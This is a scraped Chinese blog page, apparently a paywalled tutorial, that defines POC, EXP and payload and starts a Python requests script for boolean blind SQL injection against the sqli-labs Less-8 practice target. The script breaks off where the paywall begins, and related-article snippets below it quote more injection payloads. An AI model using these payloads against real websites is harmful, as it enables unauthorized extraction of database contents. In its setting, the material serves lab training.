Python之路 | 布尔盲注、延时EXP编写

最新推荐文章于 2023-09-21 12:46:39 发布
VIP文章 最新推荐文章于 2023-09-21 12:46:39 发布
阅读量850 收藏 2
点赞数 2
分类专栏: 编程之路 文章标签: web安全 安全 csrf python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45996361/article/details/123804103
版权

什么是POC、EXP、payload?

答:

POC:

​ 全称为‘Proof of concept’,意为概念验证,常指为一段漏洞的证明代码

​ 理解为:发现可能存在的漏洞后,强调对漏洞是否存在进行验证

EXP:

​ 全称为‘Exploit’,意为利用,指利用系统漏洞进行攻击的动作

​ 理解为:对已存在的漏洞进行利用,强调利用已有的资源

Payload:

​ 意为有效载荷,指成功exploit之后,真正在目标系统执行的代码或指令

​ 理解为例如使用了一条恶意SQL语句,使网站出现报错回显,这挑语句就是造成报错回显的payload

使用python编写EXP

核心模块request

pip install requests

requests模块

Request支持HTTP连接保持和连接池,支持使用cookie保持会话,支持文件上传,支持自动响应内容的编码,支持国际化的URL和POST数据自动编码

requests会自动实现持久连接keep-alive

支持的HTTP方法

  • GET 获取资源
  • POST 传输实体主体
  • PUT 传输文件
  • HEAD 获取响应报文首部
  • DELETE 删除文件
  • TRACE 追踪路径
  • CONNECT 要求用隧道协议连接代理
  • LINK 建立和资源之间的连接
  • UNLINK 断开连接关系

requests获取HTTP方式

res = requests.get()
res = requests.post()
.......

构造布尔盲注EXP

平常的盲注如果手工的话会很麻烦,多数情况下大家会选择SQLmap等相关软件一把梭

但是有些情况下,考虑到SQLmap的线程和其他情况会造成一些影响

所以我们可以简单的利用python来构造一个盲注脚本(低线程、高效率)

求数据库长度和名字(一)

import requests

url = 'http://14af1b91-a892-4c9e-b896-0835afaafb8a.node4.buuoj.cn/Less-8/?id=1'
payload1 = "'and length(database())={}%23"
payload2 ="' and ascii(substr(database(),{},1))={}%23 "
exp1 = url + payload1
exp2 = url + payload2
headers = {
   
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0'
}

i = 0
while 1:
    req = requests.get(url=exp1.format(i), headers=headers)
    #print(exp1.format(i))
    if "You are in..........." in req.text
最低0.47元/天 解锁文章
1erkeU
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
使用python编写sql时间盲注exp
CC210231的博客
04-05 1929
前言: 前面学习了布尔盲注exp,原理是根据页面的两个返回状态来确定注入的语句是否正确执行,从而得到我们想要的数据,但有时候,页面只会返回一种状态,布尔盲注就无法实行了,此时,我们就要用到另一种盲注方式:时间盲注,也叫延时注入 延时注入原理: 延时注入是利用sql语句达到延时的目的,在mysql中用的sleep()函数, select sleep(3) 数据库延时3秒 返回信息。利用这个函数加上if函数进行判断,就可以达到延时注入,注入得出数据。 我们在exp中怎样利用呢? 我们可以获
布尔盲注python3范本模板
01-16
布尔盲注python3范本模板
SQL注入之基于布尔盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间盲注。这篇文章主要讲解的是基于布尔盲注。下面来一起看看吧。
(手工)【sqli-labs15-16】POST注入:布尔/时间盲注
07-07 949
【SQL-POST】布尔/时间盲注
Python 安全开发 时间盲注脚本
YouthBelief的博客
10-26 1287
时间盲注0x00 时间盲注原理用到的函数有流程0x01脚本编写 (请求少,费时多)1.1用到的库1.2判断页面响应1.3判断返回字符串长度1.4 获取查询结果1.5 主函数0x02 脚本编写(请求多,费时少) 0x00 时间盲注原理 时间盲注应用于 页面 无论输入什么 页面显示 内容都一样, 可以用 ’ and sleep(5) --+ 发现 页面响应超过5秒 用到的函数有 sleep(5) 延时函数 延迟5秒 if($SQL,sleep(5),1) if函数 如果sql语句为真,执行sleep
Python安全编写SQL注入漏洞利用脚本(EXP)
gaojian5422的博客
02-28 1426
本例中以靶机DVWA中的盲注为例。
Python自动化sql注入:布尔盲注
qq_46145027的博客
04-22 2981
在sql注入时,使用python脚本可以大大提高注入效率,这里演示一下编写python脚本实现布尔盲注的基本流程:演示靶场:sqli-labs。
python布尔盲注的脚本
kiihuang的博客
03-28 469
使用python编写一个可以自动爆破的布尔盲注脚本,根据不同情况调整里面的Content-Length的值。
渗透测试-SQL注入之布尔盲注时间盲注
lza20001103的博客
04-20 2602
渗透测试-SQL注入之布尔盲注时间盲注
基于python布尔盲注爆破脚本(sqli-libs第八关)
henghengzhao_的博客
10-06 1748
这个脚本的原因是因为布尔爆破步骤的繁琐,因此下这个半自动化脚本来提升效率,只需输入url和标志词便可开始爆破
Python----POC到EXP(requests模块、python脚本实现布尔盲注延时注入)
Pluto.的博客
12-27 2272
文章目录Python一、编写EXP1. requests模块- 概述- 支持HTTP的方法- requests使用HTTP方法- 参数- 对象对应的方法2. 快速开始3. 相关操作- 定制头部- 超时- GET传参- POST传参- 上传文件- 重定向- cookie4. py脚本实现布尔盲注5. py脚本实现延时注入- sys.argv[ ] Python 一、编写EXP EXP是漏洞利用工具; 基础环境Python3,核心模块requests。 1. requests模块 - 概述 requests
布尔盲注.py_sql盲注python_
10-03
一个简单的sql注入盲注python脚本,其中语句需要根据环境条件做改变
布尔盲注python脚本.zip
12-28
GET和POST型python脚本
布尔盲注python脚本
04-22
.py文件,python脚本实现布尔盲注,输入网址实现自动化注入,信息包括数据库名、表名、字段以及字段中数据。 代码示例靶场:sqli_labs第八关实测可行 注意事项:python3.8,就用了一个requests第三方库,单线程实现...
SQL 盲注GET /POST、布尔型,延时Python脚本
小锤队长的博客
08-09 4178
以下脚本都用 sql-labs 中的题目进行测试: sql-labs 靶场:http://43.247.91.228:84/ 一,sql注入之 GET传参 之 布尔型: import requests result = "" url_template = "http://43.247.91.228:84/Less-8/?id=2' and ascii(substr(({0}),{1...
python脚本实现sql时间盲注
wrypot的博客
03-27 676
python脚本实现sql盲注 sqli-labs-master pass-10 有好用脚本的大佬可以分享一波,抄袭转载请附上本文地址,违法必究。做时间盲注的只需要改一下url和payload,payload里面的闭合字符要改成正确的。将列的ascii码转化为字符,跟上面将表名的ascii码转化为字符一样。这里用sqli-labs-master第10关举例。将字段ascii码转化为字符。将表的ascii转化为字符。3、爆表名的ascii码。4、爆列的ascii码。5、爆字段ascii码。
浅谈布尔盲注(sqli-labs less-8)
sxy1_的博客
09-21 114
substr(str,num1,num2) 这个函数用于截取字符串中的字符,"str"是一串字符串,"num1"是字符串中被截取的位置,“num2”是截取字符的个数 ,所以substr((select database()),1,1) 是截取数据库库名的第一个字符;这两天一直在做布尔盲注的题(例:sqli-labs less-8),快吐了,一个一个试字符太麻烦,在网上找了好几个布尔盲注的脚本,都大同小异,研究了一下,自己了一个脚本,勉强能用。column 字段 column_name 字段名。
Python SQL布尔盲注
weixin_45972507的博客
07-03 224
自主博客开发,进行SQL布尔盲注
盲注exp
yyj1781572的博客
11-02 244
上次介绍了简单的注入exp编写,那是根据注入的payload匹配网页内容得到的注入数据,像这种只能应用简单的注入,盲注入就要复杂一些,但原理也差不多。
python实现sql布尔盲注
最新发布
10-12
SQL布尔盲注是一种利用SQL注入漏洞的攻击方式,通过构造特定的SQL语句,判断某个条件是否成立,从而获取数据库中的信息。Python可以通过requests库发送HTTP请求,用布尔盲注进行攻击。 以下是一个简单的Python代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1erkeU

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值